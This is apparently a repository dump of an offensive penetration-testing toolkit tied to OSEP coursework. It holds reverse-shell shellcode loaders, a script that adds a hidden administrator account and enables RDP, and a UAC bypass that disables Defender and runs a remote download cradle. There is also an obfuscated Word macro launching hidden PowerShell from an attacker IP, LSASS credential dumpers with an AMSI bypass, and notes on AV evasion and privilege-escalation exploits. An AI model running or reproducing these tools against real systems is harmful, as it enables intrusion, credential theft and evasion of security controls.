15 | int gpgrt_poll; 16 | 17 | // ROT13-encoded 'linux/x64/shell_reverse_tcp' payload 18 | char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12"; 19 | 20 | void runmahpayload() { 21 | setuid(0); 22 | setgid(0); 23 | printf("Library hijacked!\n"); 24 | int buf_len = (int) sizeof(buf); 25 | for (int i=0; i" 36 | } 37 | Create-Admin -------------------------------------------------------------------------------- /payloads/Misc/Create-Admin.ps1: -------------------------------------------------------------------------------- 1 | #Requires -RunAsAdministrator 2 | # (New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/Create-Admin.ps1') | IEX 3 | function Test-Administrator 4 | { 5 | $user = [Security.Principal.WindowsIdentity]::GetCurrent(); 6 | (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 7 | } 8 | 9 | function Create-Admin{ 10 | # Create an Administrator user on the box and enable RDP (Requires Admin Privs) 11 | [CmdletBinding()] 12 | param ( 13 | $username="nbaYoungboy", 14 | $password="5laaat23!" 15 | ) 16 | if( !(Test-Administrator) ){ 17 | Write-Output "This must be ran as an Administrator." 18 | Return 19 | } 20 | 21 | # Create new local administrator 22 | net user $username $password /add && net localgroup administrators $username /add && net localgroup "Remote Desktop Users" $username /add 23 | 24 | # Enable RDP if it's currently disabled 25 | $RDP = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" 26 | if ($RDP.fDenyTSConnections -eq 1) { 27 | Write-Output "Enabling Remote Desktop..." 
28 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 29 | netsh advfirewall firewall set rule group='remote desktop' new enable=Yes 30 | Write-Output "Remote Desktop is now enabled." 31 | } else { 32 | Write-Output "Remote Desktop is already enabled." 33 | } 34 | 35 | Write-Host "xfreerdp +clipboard /dynamic-resolution /u:"+$username+" /p:'"+$password+"' /tls-seclevel:0 /v:" 36 | } 37 | Create-Admin -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/shakeitoff.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace MiniDump 7 | { 8 | public class MiniDump 9 | { 10 | static int MiniDumpWithFullMemory = 2; 11 | static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF; 12 | 13 | [DllImport("Dbghelp.dll")] 14 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); 15 | 16 | [DllImport("kernel32.dll")] 17 | 
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        public static void Main(string[] args)
        {
            // Get the PID of lsass.exe
            Process[] lsass = Process.GetProcessesByName("lsass");
            int lsass_pid = lsass[0].Id;
            Console.WriteLine($"Got lsass.exe PID: {lsass_pid}.");

            // Get a handle on LSASS (PROCESS_ALL_ACCESS; needs SeDebugPrivilege, i.e. an elevated context)
            IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid);
            Console.WriteLine($"Got a handle on lsass.exe: {handle}.");

            // Dump LSASS process memory to file (MiniDumpWithFullMemory = 2)
            string filePath = "C:\\Windows\\tasks\\lsass.dmp";
            using (FileStream dumpFile = new FileStream(filePath, FileMode.Create))
            {
                bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
                if (dumped)
                {
                    Console.WriteLine($"Dumped LSASS memory to {filePath}.");
                }
                else
                {
                    // GetLastWin32Error() is only meaningful if the DllImport sets SetLastError = true
                    Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}");
                }
            }
        }
    }
}
-------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/Shellcode-Encryption/readme.md: -------------------------------------------------------------------------------- 
Shellcode wrapper written in Python and C++ to bypass antivirus
============

> `@hackinAggie`
> NOTE: Credits to the original at https://github.com/yashmundra/Shellcode-Encryption/tree/master
>
> I simply fixed the path for the `shellcode_encoder.py` script to be able to output **CSHARP** payloads in python3, and added the `pycryptodome` requirement. I also gutted the CPP and Python templates to save space.

The technique uses two kinds of code files:

1. The shellcode encoder/encrypter: `shellcode_encoder.py`
2. Various shellcode wrappers, in C++, C# and Python:
   - `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption
   - `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption
   - `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption

Installation
----------------------
Installation is straightforward:
* Git clone this repository
* cd into the folder
* Install requirements using `pip install -r requirements.txt`
* Give execution rights to the main script: `chmod +x shellcode_encoder.py`

Usage
----------------------
First, obtain raw shellcode from metasploit (*run it from a Kali distribution*), for example:
```
root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw
```

Second, run the `shellcode_encoder.py` script with the desired arguments:
- raw shellcode filename
- encryption key
- encryption type: `xor` or `aes`
- desired output: `base64`, `cpp`, `csharp`, `python`

This generates C#, C++ and Python code files in the `result` folder. Those files are ready to use/compile.

-------------------------------------------------------------------------------- /Privilege_Escalation/UACBypass.ps1: -------------------------------------------------------------------------------- 
function alt {
    # Disables Windows Defender and calls a PowerShell payload for an additional, elevated reverse shell. Note that the type of payload matters!
    # Calling a remote injector/hollower w/ PPID spoofing will give you a SYSTEM shell; if you want a normal (high-integrity) one, call a standard runner.
    # The default $program turns off Defender's real-time/script scanning with Set-MpPreference and then runs a remote PowerShell download cradle.
    Param (
        [String]$program = 'Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'')'
    )
    # fodhelper.exe auto-elevates and opens the ms-settings: protocol handler. HKCU\Software\Classes is consulted
    # before HKLM, so pointing ms-settings\CurVer at our own ProgID (.yelow) makes fodhelper launch $program
    # with high integrity and no UAC prompt.
    New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
    Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -Value "" -Force

    New-Item "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Force
    Set-ItemProperty "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Name "(default)" -Value $program -Force

    Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -Value ".yelow" -Force
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    Start-Sleep 3

    # Remove the registry keys again so the bypass leaves as little trace as possible
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
    Remove-Item "HKCU:\Software\Classes\.yelow\" -Recurse -Force
}
alt

-------------------------------------------------------------------------------- /Macros/WordPsCradle.vbs: -------------------------------------------------------------------------------- 
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Sub Document_Open()
MyMacro
End Sub

Sub AutoOpen()
MyMacro
End Sub

' Decodes one 3-digit group: vbObfuscate.ps1 stored (byte + 12)
Function Grass(Goats)
Grass = Chr(Goats - 12)
End Function

Function Screen(Grapes)
Screen = Left(Grapes, 3)
End Function

Function Gorgon(Topside)
Gorgon = Right(Topside, Len(Topside) - 3)
End Function

' Decodes a whole string of 3-digit groups, three characters at a time
Function Yellow(Troop)
Do
Shazam = Shazam + Grass(Screen(Troop))
Troop = Gorgon(Troop)
Loop While Len(Troop) > 0
Yellow = Shazam
End Function

Function MyMacro()
Dim Apples As String
Dim Leap As String
Dim t1 As Date
Dim t2 As Date
Dim time As Long
' Sandbox check: if the 5 s sleep was fast-forwarded by an emulator, bail out
t1 = Now()
Sleep (5000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 4.5 Then
Exit Function
End If
'Simple heuristics bypass attempt. Ensure file is named 'app.docm' (in vbObfuscate.ps1)
If ActiveDocument.Name <> Yellow("109124124058112123111121") Then
Exit Function
End If
' Our encoded PowerShell download cradle (a command line, not shellcode; produced by vbObfuscate.ps1)
Apples = "124123131113126127116113120120044057113132113111044110133124109127127044057122123124044057131044116117112112113122044057111044117113132052122113131057123110118113111128044122113128058131113110111120117113122128053058112123131122120123109112127128126117122115052051116128128124070059059061069062058061066068058064069058066066059109128128109111116058128132128051053"
Leap = Yellow(Apples)
' Call the Win32_Process.Create() Method of the Win32 WMI Provider "winmgmts:" (in vbObfuscate.ps1)
GetObject(Yellow("131117122121115121128127070")).Get(Yellow("099117122063062107092126123111113127127")).Create Leap, Tea, Coffee, Napkin
End Function

-------------------------------------------------------------------------------- /payloads/Privilege_Escalation/UACBypass.ps1: -------------------------------------------------------------------------------- 
(Identical copy of /Privilege_Escalation/UACBypass.ps1 above; contents not repeated.)

-------------------------------------------------------------------------------- /payloads/Macros/WordPsCradle.vbs: -------------------------------------------------------------------------------- 
(Identical copy of /Macros/WordPsCradle.vbs above; contents not repeated.)

-------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/sharedLibrary_LD_PRELOAD.c: -------------------------------------------------------------------------------- 
#define _GNU_SOURCE
#include <dlfcn.h>     /* dlsym, RTLD_NEXT */
#include <stdio.h>     /* printf, perror */
#include <stdint.h>    /* intptr_t */
#include <unistd.h>    /* fork, sysconf, _exit, geteuid prototype */
#include <sys/mman.h>  /* mprotect */
#include <sys/types.h> /* uid_t */

// To compile:
// gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
// gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
// To use: LD_PRELOAD=./sharedLibrary_LD_PRELOAD.so <any program that calls geteuid()>

// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

// Hooked geteuid(): with LD_PRELOAD the dynamic loader resolves this copy before libc's,
// so every call the host program makes lands here first.
uid_t geteuid(void)
{
    // Get the address of the original 'geteuid' function in the next object in search order (libc)
    typeof(geteuid) *old_geteuid;
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");

    // Fork a child process (not a thread) so the shellcode runs without blocking the hooked program
    if (fork() == 0)
    {
        intptr_t pagesize = sysconf(_SC_PAGESIZE);

        // buf lives in the library's writable, non-executable data segment: make every page it
        // spans executable. Keep the pages writable because other .data variables share them.
        intptr_t start = ((intptr_t)buf) & ~(pagesize - 1);
        intptr_t len = ((intptr_t)buf + sizeof(buf)) - start;
        if (mprotect((void *)start, len, PROT_READ|PROT_WRITE|PROT_EXEC)) {
            perror("mprotect");
            _exit(1);   // never return into the host program's code from the child
        }

        // Cast and execute; the reverse shell execve()s /bin/sh and does not return
        int (*ret)() = (int(*)())buf;
        ret();
        _exit(0);
    }

    // Parent: transparently call the original function so the host program keeps working
    printf("[Hijacked] Returning from function...\n");
    return (*old_geteuid)();
}

-------------------------------------------------------------------------------- /Misc/AV_Stuff/Get-AppLockerRules.ps1: -------------------------------------------------------------------------------- 
function Parse-XML {
    param (
        [Parameter(Mandatory = $true)]
        [string]$XmlString
    )
    # Each registry value holds one rule as XML whose root element is the rule type
    # (FilePublisherRule, FilePathRule or FileHashRule), so the root element is the rule.
    [xml]$xml = $XmlString
    return $xml.DocumentElement
}

function Invoke-ApplockerRecon {

    # Check if AppLocker will apply to the current user context
    $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $BuiltIn = @("NT AUTHORITY\SYSTEM", "NT AUTHORITY\LOCAL SERVICE", "NT AUTHORITY\NETWORK SERVICE", "IIS APPPOOL\DefaultAppPool")
    if ($CurrentUser -in $BuiltIn) {
        Write-Output "Applocker policies do not apply to $CurrentUser"
    }

    # Parse through the rule collections (Exe, Dll, Msi, Script, Appx) cached under SrpV2
    $Rules = Get-ChildItem -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

    foreach ($ID in $Rules) {
        $RuleName = $($ID.PSChildName)
        # Reset per collection so a missing EnforcementMode value cannot inherit the previous collection's state
        $Enforcement = 'Not Configured'
        switch ($(Get-ItemProperty -Path "$($ID.PSPath)" -Name "EnforcementMode" -ErrorAction SilentlyContinue).EnforcementMode) {
            1 { $Enforcement = 'Enforced' }
            0 { $Enforcement = 'Audit Only (not enforced)' }
        }

        $Actions = Get-ChildItem -Path "$($ID.PSPath)" -ErrorAction SilentlyContinue
        foreach ($Action in $Actions) {
            $XML = Get-ItemProperty -Path "$($Action.PSPath)" -Name "Value" -ErrorAction SilentlyContinue
            # Only path conditions are listed: writable allowed paths are what an AppLocker bypass needs
            Parse-XML -XmlString $XML.Value | Select @{l = 'Rule'; e = { $RuleName } }, @{l = 'Enforcement'; e = { $Enforcement } }, ID, Name, Description, UserOrGroupSid, Action, @{l = 'Conditions'; e = { $_.Conditions.FilePathCondition.Path } }
        }
    }
}
Invoke-ApplockerRecon

-------------------------------------------------------------------------------- /payloads/Misc/Get-AppLockerRules.ps1: -------------------------------------------------------------------------------- 
(Identical copy of /Misc/AV_Stuff/Get-AppLockerRules.ps1 above; contents not repeated.)

-------------------------------------------------------------------------------- /Active_Directory/README.md: -------------------------------------------------------------------------------- 
# Active Directory Tools

## ToC

| Application | Output | Notes |
| ----------- | ------ | ----- |
| `sql` | EXE | C# project for exploitation of MSSQL servers in AD |

## `sql`

This project is a fairly robust tool for exploitation of MSSQL instances. Features include:
- Enumeration of MSSQL instances (calls setspn).
- Enumeration of linked SQL servers, users, users that can be impersonated, and the current user context.
- Execute arbitrary SQL commands.
- Enable `xp_cmdshell` or OLE objects on the current or a linked server.
- Force the SQL server to authenticate to an SMB share for use with ntlmrelayx.
- Execute `xp_cmdshell` or OLE object commands on the current or a linked server.

These features are all functional over bidirectional links.
The `InstallUtil` bypass is baked in, so this tool can be run on a machine with application whitelisting in place. Note that when running `sql.exe` with `installutil`, all switches must be passed BEFORE you specify `sql.exe`.

### Details
Below is the help message explaining the available flags.
```
MSSQL Linked Server Tool

Compatible with InstallUtil AppLocker bypass; Use /s=SQL05 syntax instead of /s:SQL05 with InstallUtil.

Modes:
/q - Query     Query a domain for MSSQ​L SPN's
/e - Enumerate Find Linked MSSQL instances and enumerate permissions
/c - Command   Execute sql queries on the logged in server
/f - Enable    Enable features like XP_cmdshell and OLE objects on a Linked server
/x - Command   Execute commands via XP_cmdshell on a linked server
/o - Command   Execute commands via OLE object on a linked server
/h - Force SQL server to authenticate to an SMB share in order to capture hash for use with ntlmrelayx

Options:
/l: Login (username) to authenticate with (default: Windows credentials)
/p: Password to authenticate with
/d: Database to connect to (default: Master)
/s: Server to connect to (default: Localhost)
/i: User to impersonate. Enter "dbo" to try and auth as dbo in the msdb database.
/t: Tunnel through a Linked MSSQL server in order to complete tasks on one of its Linked servers.
```

-------------------------------------------------------------------------------- /Loaders_Disk/formatters/bin_to_vbappArray.py: -------------------------------------------------------------------------------- 
import sys

# VBA editor limits: a physical line may hold at most 1023 characters and a logical line
# may be continued at most 24 times (25 physical lines). With up to 4 characters per byte
# ("255,") 200 bytes per physical line stays under the first limit, so the largest array
# this formatter can emit is 200 * 25 = 5000 bytes.
BYTES_PER_LINE = 200
MAX_LINES = 25
MAX_BYTES = BYTES_PER_LINE * MAX_LINES


def format_vba_array(data, name="buf"):
    """Return VBA source declaring `name` as an Array(...) of the bytes in `data`."""
    if len(data) > MAX_BYTES:
        raise ValueError(
            f"Sorry, the max size I can format is {MAX_BYTES} bytes. There's no easy way to pump "
            f"{len(data)} bytes into a VBA array; use several arrays or array concatenation.")
    chunks = [data[i:i + BYTES_PER_LINE] for i in range(0, len(data), BYTES_PER_LINE)]
    lines = [",".join(str(b) for b in chunk) for chunk in chunks]
    # " _" is VBA's line-continuation marker: the physical lines form one Array(...) statement
    return f"{name} = Array(" + ", _\n".join(lines) + ")"


if __name__ == "__main__":
    print("This program takes a binary and encodes it to an array suitable for a VBA macro. Use the msfvenom `-f raw` switch.")
    print("Example:\n\tmsfvenom -p windows/exec -f raw -o ~/raw.bin CMD='cmd.exe'\n\tpython bin_to_vbappArray.py ~/raw.bin\n")
    with open(sys.argv[1], 'rb') as f:
        data = f.read()
    try:
        print(f"[+] Formatting {len(data)} bytes to a VB Application int array.")
        print(format_vba_array(data))
    except ValueError as e:
        sys.exit(str(e))

-------------------------------------------------------------------------------- /Macros/vbObfuscate.ps1: -------------------------------------------------------------------------------- 
# Encodes strings for WordPsCradle.vbs: every character becomes (byte + 12) written as a
# zero-padded 3-digit number, which the macro's Yellow() function reverses with Chr(n - 12).
function Encode-VbString {
    param([string]$payload)
    [string]$output = ""
    $payload.ToCharArray() | %{
        [string]$thischar = [byte][char]$_ + 12
        if($thischar.Length -eq 1)
        {
            $thischar = [string]"00" + $thischar
            $output += $thischar
        }
        elseif($thischar.Length -eq 2)
        {
            $thischar = [string]"0" + $thischar
            $output += $thischar
        }
        elseif($thischar.Length -eq 3)
        {
            $output += $thischar
        }
    }
    return $output
}

# PowerShell download cradle the macro launches (the "Apples" string in WordPsCradle.vbs)
Encode-VbString "powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/attach.txt')"
write-output ""
# Win32 WMI Provider
Encode-VbString "winmgmts:"
write-output ""
# Win32 Process.Create() method
Encode-VbString "Win32_Process"
write-output ""
# planned word doc name, for heuristics check during runtime
Encode-VbString "app.docm"

-------------------------------------------------------------------------------- /Loaders_Memory/README.md: -------------------------------------------------------------------------------- 
# Loaders - Memory

Tools that aid in loading shellcode into memory, *from memory*. Usually scripts fetched remotely in PowerShell.

## ToC

| Application | Output | Notes |
| ----------- | ------ | ----- |
| `Powerinject.py` | PS | Python3 script to generate .PS1 payloads that perform process injection. |
| `Powerhollow.py` | PS | Python3 script to generate .PS1 payloads that perform process hollowing with PPID spoofing |


## [powerhollow.py](./powerhollow.py) and [powerinject.py](./powerinject.py)

These python scripts call `msfvenom` to generate shellcode, AES encrypt it, and then embed it within hardcoded PowerShell code in order to dynamically produce *.PS1* payloads according to user supplied options. These *.PS1* payloads are modeled after the OSEP *.PS1* that uses dynamic lookup rather than `add-type`, in order to avoid writing to disk when calling `csc`.
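The string obfuscation used by `vbObfuscate.ps1` (encoder) and `WordPsCradle.vbs` (the `Yellow()` decoder) above, as an added Python example that is not part of the repository. It implements both directions and uses them to recover every obfuscated literal the macro carries; the four encoded strings are copied verbatim from the macro, nothing else is assumed.

```python
# Added example (not part of the repository): the encoding that vbObfuscate.ps1 produces and
# WordPsCradle.vbs's Yellow() reverses, applied to the literals carried by the macro.

SHIFT = 12  # vbObfuscate.ps1 adds 12 to each byte; Yellow() subtracts 12 again


def encode_vb(text: str) -> str:
    """Encode like vbObfuscate.ps1: each character becomes a zero-padded 3-digit group."""
    groups = []
    for ch in text:
        n = ord(ch) + SHIFT
        if n > 999:
            # vbObfuscate.ps1 silently drops any character whose code needs 4 digits,
            # which would leave the macro with a truncated command; refuse instead
            raise ValueError(f"character {ch!r} cannot be encoded in 3 digits")
        groups.append(f"{n:03d}")
    return "".join(groups)


def decode_vb(groups: str) -> str:
    """Decode like Yellow(): consume 3 characters at a time and apply Chr(n - 12)."""
    if len(groups) % 3 or not groups.isdigit():
        raise ValueError("encoded string must be a non-empty sequence of 3-digit groups")
    return "".join(chr(int(groups[i:i + 3]) - SHIFT) for i in range(0, len(groups), 3))


# Literals carried by WordPsCradle.vbs (verbatim from the macro above)
MACRO_STRINGS = {
    "doc_name": "109124124058112123111121",
    "wmi_moniker": "131117122121115121128127070",
    "wmi_class": "099117122063062107092126123111113127127",
    "command": (
        "124123131113126127116113120120044057113132113111044110133124109127127"
        "044057122123124044057131044116117112112113122044057111"
        "044117113132052122113131057123110118113111128"
        "044122113128058131113110111120117113122128053"
        "058112123131122120123109112127128126117122115052"
        "051116128128124070059059061069062058061066068058064069058066066059"
        "109128128109111116058128132128051053"
    ),
}


def decode_macro_strings() -> dict:
    """Recover every obfuscated literal of the macro, as an analyst triaging the document would."""
    return {name: decode_vb(value) for name, value in MACRO_STRINGS.items()}


if __name__ == "__main__":
    for name, clear in decode_macro_strings().items():
        print(f"{name:12} {clear}")
    # Round trip: re-encoding the recovered cradle gives back the macro's literal
    assert encode_vb(decode_macro_strings()["command"]) == MACRO_STRINGS["command"]
```

Running it prints the document name check (`app.docm`), the WMI moniker and class (`winmgmts:` / `Win32_Process`) and the full PowerShell cradle, which is exactly the `$payload` string at the top of `vbObfuscate.ps1`. The same decoder is what you would drop into a triage script for any document using this macro: the 3-digit groups and the `Chr(n - 12)` step are the only two things a detection needs to key on.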

`Powerinject.py` payloads succeed here; however, I was unable to find a way to define the structs necessary for doing PPID spoofing with process hollowing, so **add-type IS called in the `Powerhollow.py`** *.PS1* payloads. This is only done for the necessary structs and the `CreateProcess()` Win32 API; all other required APIs are resolved dynamically.

Run the appropriate python script for the kind of payload you want to use, then place the produced files in your webserver directory and use the supplied PS one-liner to call them. If you see in the debug output that it is failing to open a process, try a couple more times. Sometimes there just isn't a suitable process to inject into, but after a couple of tries it finds one.

### Updates from OSEP-Tools version
- `powerinject.py` payloads now detect if they are being run in a 32-bit PS context, and auto download-and-execute themselves in a 64-bit process.
  - This is useful if your stager is run from a 32-bit process (Word macros), resulting in a 32-bit PS process.
- You can now use the `-D` argument to have the payload output useful debugging statements and help you determine where in the process of setting up the reverse shell it is failing.
- You no longer have to specify the integrity of your target process, as the script will determine the current process's permissions and look up processes based on it, going for SYSTEM if elevated.
- You may now specify "`any`" as an argument for the target process, to increase the odds of finding a suitable process to inject into.
  - Useful when targeting servers where there are few to zero processes you can inject into (i.e. they're all running elevated and you're attempting to get initial access with low privs).
  - **NOTE**: You may inject into some interesting processes which could lead to unstable shells (if you inject into ephemeral procs), or unstable systems (if you inject into a sensitive, important proc). I've had good results with it though.

-------------------------------------------------------------------------------- /Privilege_Escalation/README.md: -------------------------------------------------------------------------------- 
# Privilege Escalation

## ToC

| Application | Output | Notes |
| ----------- | ------ | ----- |
| `PrintSpoofer.NET` | EXE | Creates a pipe and impersonates tokens to run a binary |
| `SpoolSample.exe` | N/A | Coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface |
| `UACBypass.ps1` | PS | FODhelper UAC Bypass script |
| `shakeitoff` | EXE | CVE-2021-43883. Replace a target privileged binary with a binary of your choice, then run it with SYSTEM privileges |

## `PrintSpoofer.NET`

Impersonates the token of the SYSTEM client (the print spooler) that the PrintSpooler coercion connects to our named pipe, and uses that token to run a given binary; the calling context needs SeImpersonatePrivilege. *Modified to not require an interactive logon session*. Takes arguments for the pipe name and the binary to run.

Requires another tool (`SpoolSample.exe`) to trigger the pipe authentication from our target process.

## `SpoolSample.exe`

Precompiled binary of the [SpoolSample](https://github.com/leechristensen/SpoolSample) tool to coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface. For use with the `PrintSpoofer.NET` binary.

## `UACBypass.ps1`

UAC bypass using FODhelper, covered in PEN-300 Section 7.5.1, to elevate privileges for a user account that has *Administrator* privileges but is running in a medium integrity process.

### Usage
Obviously there are many ways, but you can just load it as a module.
```ps1
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass;. .\UACBypass.ps1
```

## `shakeitoff`

Modification of [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff) (CVE-2021-41379 variant) that lets the user specify the file that will replace the target binary, then starts the Microsoft Edge Elevation Service so that the replaced binary runs as SYSTEM.

You need both `shakeitoff.exe` and `shakeitoff.msi` on the target. Note that this will replace `elevation_service.exe`, so make a copy of it if you need to restore it! This of course requires that Edge is installed on the target machine and that the service exists.

Tested successfully on Windows 10, 11, Server 2016, and Server 2019. This is patched as of Dec 14th 2021 (KB5008212) and was assigned the new CVE-2021-43883. Additionally, a switch was added to allow the user to specify what file to overwrite the target file with (as opposed to the original POC, which overwrote the target file with the POC itself).

Check out [its own README](./shakeitoff/README.md) or the above linked repo for more information on the exploit and how to use it. More details on the underlying vulnerability at [AttackerKB-CVE-2021-41379](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis).

### Usage
```
shakeitoff.exe -m c:\users\user\shakeitoff\shakeitoff.msi -i c:\users\user\write\ -c c:\users\user\source\repos\d_invoke\inject.exe -p "C:\Program Files (x86)\Microsoft\Edge\Application\96.0.1054.53\elevation_service.exe"
```

-------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.ps1: -------------------------------------------------------------------------------- 
# Bypass AMSI because we're cool
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)

# Utility functions: resolve a Win32 export by name without Add-Type (no csc.exe, nothing written to disk)
function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

# Build a delegate type in a dynamic in-memory assembly so the raw function pointer can be called
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
        [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

# Add dbghelp.dll and reflectively load the function while we're at it
# (somehow dbghelp.dll doesn't play nice with LookupFunc: GetModuleHandle only finds DLLs that are
# already loaded in the process, whereas Add-Type's DllImport loads dbghelp.dll for us)
$MethodDefinition = @'
[DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)]
public static extern bool MiniDumpWriteDump(
    IntPtr hProcess,
    uint processId,
    IntPtr hFile,
    uint dumpType,
    IntPtr expParam,
    IntPtr userStreamParam,
    IntPtr callbackParam
);
'@
$dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru

# Get LSASS PID
$lsassPid = Get-Process lsass | select -ExpandProperty Id
Write-Host("Got lsass.exe PID: $lsassPid.")

# Get a handle on LSASS with PROCESS_ALL_ACCESS (0x1F0FFF); requires an elevated (SeDebugPrivilege) context
$handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
    (getDelegateType @([UInt32], [Bool], [Int])([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid)
if ($handle -eq [IntPtr]::Zero) {
    Write-Host("OpenProcess on lsass.exe failed: are you running elevated?")
    return
}
Write-Host("Got handle on LSASS: $handle.")

# Dump process memory to file (dumpType 2 = MiniDumpWithFullMemory)
